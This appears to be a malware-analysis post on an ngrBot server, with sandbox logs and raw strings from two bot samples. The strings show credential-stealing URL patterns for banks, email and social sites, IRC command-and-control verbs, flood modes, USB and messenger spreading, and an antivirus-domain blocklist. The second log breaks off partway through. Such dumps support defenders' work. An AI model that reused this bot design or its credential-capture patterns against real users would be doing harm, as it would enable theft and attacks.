Large ngrBot server hosted in Germany
Here u have strings from 2 executable samples
Processes: PID ParentPID User Path -------------------------------------------------- 2872 1236 C:Documents and SettingsMes documents30upjmrlzz.exe Ports: Port PID Type Path -------------------------------------------------- Explorer Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found IE Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found Loaded Drivers: Driver File Company Name Description -------------------------------------------------- Monitored RegKeys Registry Key Value -------------------------------------------------- Kernel31 Api Log -------------------------------------------------- ***** Installing Hooks ***** 719f74df RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters) 719f80c4 RegOpenKeyExA (Protocol_Catalog9) 719f777e RegOpenKeyExA (00000095) 719f764d RegOpenKeyExA (Catalog_Entries) 719f7cea RegOpenKeyExA (000000000001) 719f7cea RegOpenKeyExA (000000000002) 719f7cea RegOpenKeyExA (000000000003) 719f7cea RegOpenKeyExA (000000000004) 719f7cea RegOpenKeyExA (000000000005) 719f7cea RegOpenKeyExA (000000000006) 719f7cea RegOpenKeyExA (000000000007) 719f7cea RegOpenKeyExA (000000000008) 719f7cea RegOpenKeyExA (000000000009) 719f7cea RegOpenKeyExA (000000000010) 719f7cea RegOpenKeyExA (000000000011) 719f7cea RegOpenKeyExA (000000000012) 719f7cea RegOpenKeyExA (000000000013) 719f7cea RegOpenKeyExA (000000000014) 719f7cea RegOpenKeyExA (000000000015) 719f7cea RegOpenKeyExA (000000000016) 719f7cea RegOpenKeyExA (000000000017) 719f7cea RegOpenKeyExA (000000000018) 719f7cea RegOpenKeyExA (000000000019) 719f2623 WaitForSingleObject(77c,0) 719f87c6 RegOpenKeyExA (NameSpace_Catalog5) 719f777e RegOpenKeyExA (00000039) 719f835b RegOpenKeyExA (Catalog_Entries) 719f84ef RegOpenKeyExA (000000000001) 719f84ef RegOpenKeyExA (000000000002) 719f84ef RegOpenKeyExA (000000000003) 719f84ef RegOpenKeyExA (000000000004) 719f2623 WaitForSingleObject(774,0) 719e1af2 RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters) 719e198e GlobalAlloc() 7c80b72f ExitThread() 7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000 7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 73371c38 GetCommandLineA() 73372f57 CreateMutex((null)) 7d23eab5 WaitForSingleObject(764,7530) 410de8 LoadLibraryA(KERNEL32.DLL)=7c800000 410de8 LoadLibraryA(MSVBVM60.DLL )=73370000 733739f4 GetCommandLineA() 7338d1b3 LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0 7337452c GetVersionExA() 7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 772370b9 GetVersionExA() 7723711c GetCommandLineA() 7337476c LoadLibraryA(SXS.DLL)=77210000 774efa66 LoadLibraryA(oleaut32.dll)=770e0000 73376792 RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors) 77daeff6 RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors) 770fc957 LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000 7337a15b LoadLibraryA(kernel32.dll)=7c800000 406f1e LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(kernel32)=7c800000 7337a15b LoadLibraryA(USER32)=7e390000 7345d09c CreateFileA(C:Documents and SettingsMes documents30upjmrlzz.exe) 7345d34f ReadFile() 406f1e LoadLibraryA(NTDLL)=7c910000 7c8165b3 WaitForSingleObject(74c,64) 7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 7337a4c5 GetCurrentProcessId()=1236 7337bdfa RegOpenKeyExA (HKLMSoftwareMicrosoftWindows) 7337be1c RegOpenKeyExA (HTML Help) 7337be1c RegOpenKeyExA (Help) 7337c9ce WaitForSingleObject(7e4,ffffffff) 73373657 ExitProcess() ***** Injected Process Terminated ***** DirwatchData -------------------------------------------------- WatchDir Initilized OK Watching C:DOCUME~1LOCALS~1Temp Watching C:WINDOWS Watching C:Program Files Created: Modifed: Created: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp Created: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp Deteled: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp File: 30upjmrlzz.exe Size: 116236 Bytes MD5: AB7DDF19DE425E6439160DD343B391E1 Packer: File not found C:iDEFENSESysAnalyzerpeid.exe File Properties: CompanyName H3 7H FileDescription FileVersion 43.34.0003 InternalName 1 LegalCopyright OriginalFilename ProductName 4H37H ProductVersion Exploit Signatures: --------------------------------------------------------------------------- Scanning for 19 signatures Scan Complete: 312Kb in 0,031 seconds Urls -------------------------------------------------- http://%s/%s http://%s/ http:// RegKeys -------------------------------------------------- gdatasoftware. sunbeltsoftware. SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun ExeRefs -------------------------------------------------- File: 30upjmrlzz_dmp.exe_ .exe %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s %0x.exe Internet Exploreriexplore.exe pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe .exe lol.exe winlogon.exe explorer.exe y%s%s.exe lsass.exe Raw Strings: -------------------------------------------------- File: 30upjmrlzz_dmp.exe_ MD5: 20355b2f65c907536ac74b1c4cae1189 Size: 319490 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. Rich: .text `.rdata .reloc WPVS t1h( _[^] QRPWV RPQWV QRPSV txVhD uaVhD QRPSV SVW3 u3h0 u!h( u3h0 PQRV RPQW u:WhD u#WhD QRPW RPQV RPQV PQRV RPQW RSSh vG9u t0WSV WVRj WSPQR vt9u t0WSV WVRj WSPQR gfff WVRj PWQR u3h0 u!h( u3h0 >CAL uGh4 =MSG t =SDG >MSG u` SVW3 SVW3 9:vP G;9r @W;F Wj h t&j,j Wjdj F4VP SWf9 t-f; t=hH _^[] =pzC |04+~4 _^[] SVWP3 QWSVR =lzC QPRWS RPQS WQRV _^[] _^[] un9F t2j h L9_@vI ;_@r WVPQR SQRj STFU =pzC A8j@ QWRPV B0QPV =4yA PQRj PQRj SVWh STFU Vh@P@ L9^8vE ;^8r =pzC hpP@ STFU PL9^(v^ 9+=pzC +=pzC +=pzC +=pzC +=pzC +=pzC ;^(r 9~0v/ ;~0r 9^8v; :+=pzC +=pzC +=pzC ;^8r 9^@v2 :+=pzC +=pzC +=pzC ;^@r tu9] RVWPQ uXWV QVWRP u$WP E$_^[ tpVW uTVW E$_^[ E$^[ E$_^[ j&hx t}hP QVWh 95hVA QVht 8POST tWWV PQWj RPQVW RPQVW WVRPS u h( QWRS SVWh SVW3 95PWA ;5PWA 95PWA ;5PWA VWQh4 t"j V SVWh =USERt =PASS :Uu#Vh 8Pu. =FEATt =TYPEt =PASVu =STATt =LISTu uuhh ucWVh RPQh PQRh QRPh QVh: Rh~f _[^] _[^] F/PQ ~(WR T0(RW t=VW Qh~f u4SV W$RP tmQh RSSh t,PVQ O,@PQ TSVW3 WWWWh F4RP LSVW3 ^<^[ V4QR vJ9^,u ;F8v N4PQ F4RP F@@PR F,BRP u-SSV RSWWj 8httpu1 u$8H QRVP RVPQ QRVP RVPQ =|[A Qh~f SVWP =|[A Rh~f hh)A h`)A =|[A tlWP =|[A tlWP =|[A Rh~f =|[A =|[A _^[] h0^A hh^A SVWj _^Yj QPPPPh h(*A SVWj, VjP [@^] Vj.P [@^] QRRj RRRRf [_^] SVWh h0*A *t2: VhH*A Qh4*A QSV3 j PhxWA h`*A Vj#S _^[] Wj*P ^[_] h0+A h$+A SVWh VVVV WWVS SVW3 RVh- @PVj PVh- VhH+A SVW3 @PVj RVj"W hT+A hT+A h|+A ht+A Rhh+A QhX+A @PVR Wj j+V <%u2 VVVV SVWh QRPu PQRu h ,A QRhL]A PhTA Ph$]A 9Q@w RRhh h`]A h`]A h`]A h`]A Ph0]A 8nu8h Rh0]A Qh0]A Rh0]A Ph@]A 8nu8h Rh@]A Qh@]A Rh@]A htXA h@XA PVRQhT`A PQRVh RQPhT`A PQRSh 8_^[ hPXA hXA hHXA Rh0]A Rh0]A Rh@]A Qh@]A h|,A h|,A hx,A QhP_A Qh|_A hx,A h(XA hp,A hd,A h8XA 8httpuM 8:uE u>8P PhD,A $_^[ Qh@`A _^[ h@,A h(`A h|bA QRPh4,A h`XA h4XA hXXA hpXA QRPh4,A hhXA RPQh4,A SVWh 8#t" RVWP SVWR hx,A hx,A hx]A Qhl]A PQh0]A u(hl Ph$]A QRh0]A SVW3 h -A t"h<-A t"h0-A u5h(-A Vh$cA VhDcA VhdcA VhpcA t)h0u SVW3 RPhD-A QRPh QRPh PQRhTaA PQhDbA PRh(aA QRPh SVW3 tRh|,A uBPh h`]A h -A PWQRh SPQh PSRhTaA PhTaA PRhDbA Ph(aA hx,A tqCh s[h5 ht.A SWhl.A hd.A t'j j h<.A h46A SVWh hx,A Rh$6A h/A h/A tb@Ph Rhd/A ;< t SVW3 Wh00A h 0A 5$iA 50iA 5<iA 5HiA 5TiA 5`iA 5liA 95$iA 6 iA taVW h@0A hD0A Ph<_A |Sj 3 tlSSSSSSSSSShL0A Phd0A tU< u u2Wh h(3A hT+A hT+A SVWh hT+A h,3A u.h,3A SVWh RhP3A PVQR h@3A ;SDG 8SDG h,3A Qhx3A RPhl3A QRhT3A t!WV _^[] hl.A hd.A hl.A hd.A h(mA h(5A t!h85A _^t) 9|:~ :~+w:~ tK@boL@ L@iBK@ %s.%s pdef %s.%S %s.Blocked "%s" from removing our bot file! %s.Blocked "%S" from removing our bot file! block bdns CreateFileW 0123456789ABCDEF %s.Blocked "%s" from moving our bot file %s.Blocked "%S" from moving our bot file %s.p10-> Message hijacked! %s.p10-> Message to %s hijacked! %s.p21-> Message hijacked! msnmsg msnint baddr X-MMS-IM-Format: CAL %d %256s msnu Done frst ngr->blocksize: %d block_size: %d NtFreeVirtualMemory NtAllocateVirtualMemory NtQuerySystemInformation LdrEnumerateLoadedModules NtQueryInformationProcess LdrGetProcedureAddress NtQueryVirtualMemory LdrLoadDll NtQueryInformationThread LdrGetDllHandle RtlAnsiStringToUnicodeString .pipe%s kernel32.dll GetNativeSystemInfo %s_%d %s_0 %s-Mutex SeDebugPrivilege ntdll.dll NtGetNextProcess %s-pid %s-comm NtResumeThread PONG JOIN # PRIVMSG # %s.Blocked "%S" from creating "%S" %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot! .exe %s.Detected process "%S" sending an IRC packet to server %s:%d. %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s). PRIVMSG %255s JOIN %255s PRIVMSG JOIN %s:%d NtSetInformationProcess %s.%s%s %S%s%s HKCU HKLM %s.%S%S %S%S%S state_%s %s.%s (p='%S') pop3://%s:%s@%s:%d popgrab %s:%s@%s:%d anonymous ftp://%s:%s@%s:%d ftpgrab %s.%s ->> %s (%s : %s) %s.%s ->> %s : %s Directadmin WHCMS cPanel blog %s-%s-%s ffgrab iegrab %s.Blocked possible browser exploit pack call on URL '%s' %s.Blocked possible browser exploit pack call on URL '%S' webroot. fortinet. virusbuster.nprotect. gdatasoftware. virus. precisesecurity. lavasoft. emsisoft. onlinemalwarescanner. f-secure. bullguard. clamav. pandasecurity. sophos. malwarebytes. sunbeltsoftware. norton. norman. mcafee. symantec comodo. avast. avira. avg. bitdefender. eset. kaspersky. trendmicro. iseclab. virscan. garyshood. viruschief. jotti. threatexpert. novirusthanks. virustotal. login[password] login[username] *members*.iknowthatgirl*/members* IKnowThatGirl *youporn.*/login* YouPorn ** Brazzers clave numeroTarjeta *clave=* *bcointernacional*login* Bcointernacional *:2222/CMD_LOGIN* *whcms*dologin* *:2086/login* *:2083/login* *:2082/login* **user_login* Webnames **login* Dotster loginid ** Enom login.Pass login.User *login.Pass=* ** 1and1 token **Login* Moniker LoginPassword LoginUserName *LoginPassword=* **login* Namecheap loginname ** Godaddy Password EmailName *Password=* ** Alertpay **ogin* Netflix ** Thepiratebay **login* Torrentleech **/signin-do* Vip-file *pas=* **/signin-do* Sms4file ** Letitbit ** Whatcd ** Oron **login* Filesonic ** Speedyshare *pw=* **login* Uploaded **login* Uploading loginUserPassword loginUserName *loginUserPassword=* ** Fileserve ** Hotfile ** 4shared txtpass txtuser *txtpass=* ** Netload ** Freakshare login_pass *login_pass=* **login* Mediafire ** Sendspace *megaupload.*/*login* Megaupload *depositfiles.*/*/login* Depositfiles userid *signin.ebay*SignIn eBay **login.asp* OfficeBanking *secure.logmein.*/*logincheck* LogMeIn session[password] session[username_or_email] *password]=* * Twitter txtPassword txtEmail *&txtPassword=* *.moneybookers.*/* Moneybookers *runescape*/*weblogin* Runescape *dyndns*/account* DynDNS *&password=* *no-ip*/login* NoIP *steampowered*/login* Steam quick_password quick_username username *hackforums.*/member.php Hackforums email *facebook.*/login.php* Facebook **/*login* Yahoo passwd login *passwd=* **/*post.srf* Live TextfieldPassword TextfieldEmail *TextfieldPassword=* *gmx.*/*FormLogin* *Passwd=* Gmail FLN-Password FLN-UserName *FLN-Password=* *fastmail.*/mail/* Fastmail pass user *pass=* *bigstring.*/*index.php* BigString screenname **/login.psp* password loginId *password=* *aol.*/*login.psp* Passwd Email *service=youtube* *google.*/*ServiceLoginAuth* YouTube login_password login_email *login_password=* *paypal.*/webscr?cmd=_login-submit* PayPal %s / ?%d HTTP/1.1 Host: %s User-Agent: %s Keep-Alive: 300 Connection: keep-alive Content-Length: 42 POST Mozilla/4.0 Connection: Close X-a: b .PHYSICALDRIVE0 00100 SeShutdownPrivilege NtShutdownSystem This binary is invalid. Main reasons: - you stupid cracker - you stupid cracker... - you stupid cracker?! ngrBot Error shell32.dll http httpi usbi dnsapi.dll DnsFlushResolverCache http://%s/%s http://%s/ HTTP Host: POST /%1023s {%s|%s%s}%s n%s{%s|%s%s}%s <br> admin isadmin %s|%s|%s [DNS]: Redirecting "%s" to "%s" disabled enabled %s|%s [Logins]: Cleared %d logins #user #admin #new removing exiting reconnecting MOTD bsod disable POP3 -> FTP -> [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s) dlds http:// rebooting [Login]: %s [DNS]: Blocked %d domain(s) - Redirected %d domain(s) [Speed]: Estimated upload speed %d KB/s SoftwareMicrosoftWindowsCurrentVersionRun ngrBot running IPC_Check shellopencommand= shellexplorecommand= icon=shell32.dll,7 useautoplay=1 action=Open folder to view files shellexecute= [autorun] .lnk %windir%system32cmd.exe &&%%windir%%explorer.exe %%cd%%%s /c "start %%cd%%RECYCLER%s RECYCLER .inf %s%s .%c: %s%s %sautorun.tmp %sautorun.inf %c: gdkWindowToplevelClass %0x.exe comment-text *bebo.*/c/home/ajax_post_lifestream_comment bebo Lifestream *bebo.*/c/profile/comment_post.json bebo Comment Message *bebo.*/mail/MailCompose.jsp* bebo Message *friendster.*/sendmessage.php* Friendster Message comment Friendster Comment shoutout *friendster.*/rpc.php Friendster Shoutout * vkontakte Message * vkontakte Wall message * vkontakte Chat text *twitter.*/*direct_messages/new* Twitter Message *twitter.*/*status*/update* Twitter Tweet status *facebook.*/ajax/*MessageComposerEndpoint.php* Facebook Message msg_text *facebook.*/ajax/chat/send.php* Facebook IM -_.!~*'() Content-Length: %s.%s hijacked! MSG %d %s %d MSG %d %1s SDG %d %d Reliability: From: Content-Length: %d X-MMS-IM-Format: SDG %d bmsn %s_0x%08X RegCreateKeyExW RegCreateKeyExA URLDownloadToFileW URLDownloadToFileA PR_Write DnsQuery_W DnsQuery_A InternetWriteFile HttpSendRequestW HttpSendRequestA GetAddrInfoW send CreateFileA MoveFileW MoveFileA DeleteFileW DeleteFileA CopyFileW CopyFileA NtQueryDirectoryFile NtEnumerateValueKey %08x OPEN DnsFree DnsQuery_A DNSAPI.dll FreeContextBuffer InitializeSecurityContextW FreeCredentialsHandle DeleteSecurityContext QueryContextAttributesW AcquireCredentialsHandleW EncryptMessage DecryptMessage InitializeSecurityContextA ApplyControlToken Secur32.dll SHGetSpecialFolderPathW SHGetFileInfoA ShellExecuteA SHELL32.dll InternetCloseHandle InternetReadFile InternetQueryDataAvailable HttpQueryInfoA InternetOpenUrlA InternetOpenA HttpQueryInfoW InternetQueryOptionW WININET .dll PathAppendW StrStrIA PathAppendA PathFindExtensionA SHLWAPI.dll WS2_32.dll memset wcsstr strstr wcsrchr ??3@YAXPAX@Z atoi sscanf _strcmpi printf _snprintf sprintf strncpy _memicmp _wcsnicmp _vsnprintf _stricmp strtok strchr _snwprintf ??2@YAPAXI@Z _strnicmp isxdigit memmove strncmp toupper strrchr vsprintf isalnum strncat MSVCRT.dll lstrcpyA MoveFileExA lstrcmpA WideCharToMultiByte MoveFileExW lstrcmpW ExitThread MultiByteToWideChar GetFileAttributesA SetFileAttributesW GetFileAttributesW LoadLibraryW CloseHandle SetFileTime CreateFileW GetFileTime GetSystemTimeAsFileTime WriteFile GetModuleHandleW GetLastError ReadFile GetTickCount HeapAlloc GetProcessHeap HeapFree lstrlenA Sleep WriteProcessMemory ReadProcessMemory InitializeCriticalSection LeaveCriticalSection EnterCriticalSection HeapReAlloc SetEvent ConnectNamedPipe CreateNamedPipeA CreateEventA DisconnectNamedPipe GetOverlappedResult WaitForMultipleObjects CreateFileA VirtualFreeEx VirtualAllocEx IsWow64Process CreateRemoteThread OpenProcess WaitForSingleObject ReleaseMutex MapViewOfFile OpenFileMappingA CreateFileMappingA InterlockedIncrement UnmapViewOfFile CreateMutexA GetVersionExA GetModuleFileNameW InterlockedCompareExchange CreateThread GetWindowsDirectoryW DeleteFileW GetTempFileNameW lstrcatW lstrcpynW DeleteFileA SetFileAttributesA lstrcpyW LocalFree LocalAlloc lstrcpynA SetFilePointer DeviceIoControl VirtualAlloc CreateProcessW ExitProcess lstrcatA GetVolumeInformationW GetLocaleInfoA FlushFileBuffers CopyFileW FindClose FindNextFileA FindFirstFileA SetCurrentDirectoryA LockFile GetFileSize CreateDirectoryA GetLogicalDriveStringsA OpenMutexA GetModuleFileNameA GetWindowsDirectoryA KERNEL32.dll MessageBoxA wvsprintfA wsprintfW DefWindowProcA DispatchMessageA TranslateMessage GetMessageA RegisterDeviceNotificationA CreateWindowExA RegisterClassExA USER32.dll CryptGetHashParam CryptDestroyHash CryptHashData CryptReleaseContext CryptCreateHash CryptAcquireContextA AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken RegCloseKey RegSetValueExW RegCreateKeyExW RegNotifyChangeKeyValue RegSetValueExA RegOpenKeyExA ADVAPI32.dll CoCreateInstance CoInitialize ole32.dll n;^ Qkkbal i]Wb 9a&g MGiI wn>Jj #.zf +o*7 !!!!!!!! @@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"""""""""""""""" @@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x ROCKR ROCKR ROCKR #ROCK ngrBot ELPERRO ] CUSTOMER FvLQ49IlzIyLjj6m msn.set http.set http.inj mdns stats speed logins slow ssyn stop F4XA gGWHXA 5hXA ZpXA ` WA f0WA u{A<WA [@WA PASS %s [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} USER %s 0 0 :%s NICK %s JOIN %s %s PART %s PRIVMSG %s :%s QUIT :%s PONG %s PING PRIVMSG [v="%s" c="%s" h="%s" p="%S"] [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d [Slowloris]: Starting flood on "%s" for %d minute(s) [Slowloris]: Finished flood on "%s" [UDP]: Starting flood on "%s:%d" for %d second(s) [UDP]: Finished flood on "%s:%d" [SYN]: Starting flood on "%s:%d" for %d second(s) [SYN]: Finished flood on "%s:%d" [USB]: Infected %s [MSN]: Updated MSN spread message to "%s" [MSN]: Updated MSN spread inte rval to "%s" [HTTP]: Updated HTTP spread message to "%s" [HTTP]: Injected value is now %s. [HTTP]: Updated HTTP spread interval to "%s" [Visit]: Visited "%s" [DNS]: Blocked "%s" [usb="%d" msn="%d" http="%d" total="%d"] [ftp="%d" pop="%d" http="%d" total="%d"] [RSOCK4]: Started rsock4 on "%s:%d" [RSOCK4]: Stopped rsock4 [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s) [d="%s"] Error downloading file [e="%d"] [d="%s"] Error writing download to "%S" [e="%d"] [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"] [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"] [d="%s"] Error getting temporary filename. [e="%d"] [d='%s"] Error getting application data path [e="%d"] [Visit]: Error visitng "%s" [FTP Login]: %s [POP3 Login]: %s [FTP Infect]: %s was iframed [HTTP Login]: %s [HTTP Traffic]: %s [Ruskill]: Detected File: "%s" [Ruskill]: Detected DNS: "%s" [Ruskill]: Detected Reg: "%s" [PDef+]: %s [DNS]: Blocked DNS "%s" [MSN]: %s [HTTP]: %s ftplog poplog ftpinfect httplogin httptraff ruskill rdns rreg httpspread .pipe%08x_ipc 0;0G0O0V0d0n0s0 1)13181Y1e1u1|1 2C2c2 3 363M3j3u3 6(6/686J6O6T6m6 7 7(7O7V7_7 7=8T88 9#9:9W9^9f9~9 98:R:[: ;U<e<j<p< <g=o= >*>N> ?%?/?6?A?P? 0<0E0L0S0c0i0t0{0 2!3-4d4n4s4 5(5:5?5D5a5x5 6 6J6a6 7&7.7>7I7N7f7 1#2_2 8"8Q8X8g8q8 9':;:Y: <'<1<H<X<x< =%=7=D=K=Z=w=}= >@>R>>m> ?1?<?B?j? 0g0g1 1"2Q2~2 203N3 424>4^4 8;9~9 :K:';A;_; <4<><T<^<h< =*=>=D=N=l=u= >#>)>8>>>O>Y>^>p>u> ?8?L?c?u? 0$1-1H1N1_1n1 313Y3k3 414l4 515B5P5u5 676V6_6f6v6 889Y9r9 :-:G: ;#;(;2;7;<;A;F;W; <5<?<^< <W=l=|= =d>o>{> ?/?U?`?p? 1P2T2X2 3?4a4h4 5A5H5|5 7U8]8f8}8 9'9-939q9 : :%:n: ;1;J;d; <%<3<<<B<i<v< =$=+=0===E=L=T=o=v= =6>E> ?%?4?? 0'0K0 s0x0}0 091M1g1t1 3[3q3 3*494 4-575w5~5 5B6L6 6(7I7]7z7 848_9m9w9 :+:1:7:D:Q:V:e:t: ; ;,;8;L;Q;V;n;s;x;}; ;5<B<]<w< =5===B=N=S=g=l= 5"6-6B6L6Q6c6u6 7 70767=7L7R7 94:{: '010 1.1F1^1 2(2>2P2b2t2 4K5f5 6=6K6Y6 7*7/7L7S7r7 8]8i8 9+9;9A9G9d9q9w9}9 9/:b:h: ;!;S;`;h;s; ;E<e<w< =.=<=A=F=L=R=k=u= >#>,>X> ?-??y? 42484T4`4f4 4X5]5|5 6-646D6Q6[6b6g6q6z6 9 9&9<9G9R9W99q9v9 9::G:M:b:j:z: ;.;6;;;B;H;S;c;k; <+<F<T<`< =3=E=Q= >3>T>k>z> ?Z?r?{? %0<0V0h0 141>1l1 3g3r3 34c4 5*585R5w5 6!6<6R6a6 7=7C7T7g7z7 8-9L9w9 9-:D:W: ;#;4;:;T;Z; <#<(<-<2<7<P<j<w< =)=.=K=[=`=}= >+>I>V>[>s>z> ?*?H?T?a?g?u? 0,0J0Z0g0l0v0 1%101=1C1I1W1s1y1 2'212<2J2_2 3"3@3P3V3 4)4J4h4x4 535Q5s5 6!6.656D6S6`6m6z6 7?7E7 7'8,818[8w8 8.9K9V9s9 :':,:D:T:Y:r: ;2;7;W;r;w;|; <$<5<<<F<N<b< =(=I=O=Z=r=|= >V>g>|> >#?h? 0-070D0x0 0@1G1 132D2Z2p2 3*343=3R3^3 3-434=4F5P5]5 536N6[6 637B7U7d7q7 818>8T8]8|8 9T9`9o9u9z9 :!:,:3:;:A:O:Y:f:l:r: ;(;3;9;?;Q;];c;i;{; <&<3<8<G<T<Z<`<n< <,=3=A=G=W=w=|= >@>E>> >W?`? 010C0H0M0a0f0k0 1 1$1<1M1U1 1-2O2z2 3I3Z3o3z3 4"4'4<4U4_4t4z4 575=5r5|5 6(6=6P6m6z6 7 767<7~7 8A8F8Y8c8j8 999C9 :%:,:3:=:F:e: ;+;=;D;X;];c;i;n; ;.<4<;<@<e<p<w< ="=*=0=;=F=O=Z=b=g=v={= =7>N>W>]> >&?7?~? 40;0A0Q0a0 2)2A2[2 2T3]3f5 6F6Y6t6 7I7Y7_7e7k7q7w7}7 8*808;8~8 9 9O9X9^9 9$:0:Q: :&;2;8;F; <"<2<=<Q<W<i< =$=*=4=:=E=K=S=e= >;>I> ?!?F?M?W? 1$1<1I1[1g1 2%2>2V2a2t2|2 373E3M3a3l3 3@4N4U4 5/565<5R5k5 666i6 7.7M7 8,818M8[8`8 8?9R9 :#:4:9:?:E:P:{: ;#;B;U;[;b;r; <!<o< =$=;=C=N=S=X=i=n=s=}= >">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|> ?B?H?N?T?Z?`?f?l?r?x?~? 4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6 7D7L7X77`7d7h7l7p7t7 9(949@9L9X9d9p9|9 :$:0:<:H:T:`:l:x: ; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h; 4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4 5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5 6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6 7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7 8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8 8 9,989D9P99h9x9|9 : :(:,:0:8:<:@:X:`:d:h:l:p:x:|: ; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x; < <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|< =(=0=8=@=H=T==d=l= Unicode Strings: --------------------------------------------------------------------------- Ajjj jjjj jjjj jjjj $jjj Ajjj DBWIN .pipe kernel32.dll ntdll.dll Internet Exploreriexplore.exe autorun.inf pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe flock.ex opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe HKCU HKLM Microsoft Unified Security Protocol Provider .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe l"%s" %S POST .exe lol.exe n127.0.0.1 %s:Zone.Identifier wininet.dll secur32.dll ws2_32.dll :%S%SDesktop.ini winlogon.exe explorer.exe Aadvapi32.dll urlmon.dll nspr4.dll dnsapi.dll Akernel23.dll y%s%s.exe lsass.exe Shell SoftwareMicrosoftWindowsCurrentVersionRun SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
Processes: PID ParentPID User Path -------------------------------------------------- 768 1176 C:Documents and SettingsMes documents31upjmrlzz.exe Ports: Port PID Type Path -------------------------------------------------- Explorer Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found IE Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found Loaded Drivers: Driver File Company Name Description -------------------------------------------------- Monitored RegKeys Registry Key Value -------------------------------------------------- Kernel31 Api Log -------------------------------------------------- ***** Installing Hooks ***** 719f74df RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters) 719f80c4 RegOpenKeyExA (Protocol_Catalog9) 719f777e RegOpenKeyExA (00000095) 719f764d RegOpenKeyExA (Catalog_Entries) 719f7cea RegOpenKeyExA (000000000001) 719f7cea RegOpenKeyExA (000000000002) 719f7cea RegOpenKeyExA (000000000003) 719f7cea RegOpenKeyExA (000000000004) 719f7cea RegOpenKeyExA (000000000005) 719f7cea RegOpenKeyExA (000000000006) 719f7cea RegOpenKeyExA (000000000007) 719f7cea RegOpenKeyExA (000000000008) 719f7cea RegOpenKeyExA (000000000009) 719f7cea RegOpenKeyExA (000000000010) 719f7cea RegOpenKeyExA (000000000011) 719f7cea RegOpenKeyExA (000000000012) 719f7cea RegOpenKeyExA (000000000013) 719f7cea RegOpenKeyExA (000000000014) 719f7cea RegOpenKeyExA (000000000015) 719f7cea RegOpenKeyExA (000000000016) 719f7cea RegOpenKeyExA (000000000017) 719f7cea RegOpenKeyExA (000000000018) 719f7cea RegOpenKeyExA (000000000019) 719f2623 WaitForSingleObject(77c,0) 719f87c6 RegOpenKeyExA (NameSpace_Catalog5) 719f777e RegOpenKeyExA (00000039) 719f835b RegOpenKeyExA (Catalog_Entries) 719f84ef RegOpenKeyExA (000000000001) 719f84ef RegOpenKeyExA (000000000002) 719f84ef RegOpenKeyExA (000000000003) 719f84ef RegOpenKeyExA (000000000004) 719f2623 WaitForSingleObject(774,0) 719e1af2 RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters) 719e198e GlobalAlloc() 7c80b72f ExitThread() 7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000 7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 73371c38 GetCommandLineA() 73372f57 CreateMutex((null)) 7d23eab5 WaitForSingleObject(764,7530) 410df8 LoadLibraryA(KERNEL32.DLL)=7c800000 410df8 LoadLibraryA(MSVBVM60.DLL )=73370000 733739f4 GetCommandLineA() 7338d1b3 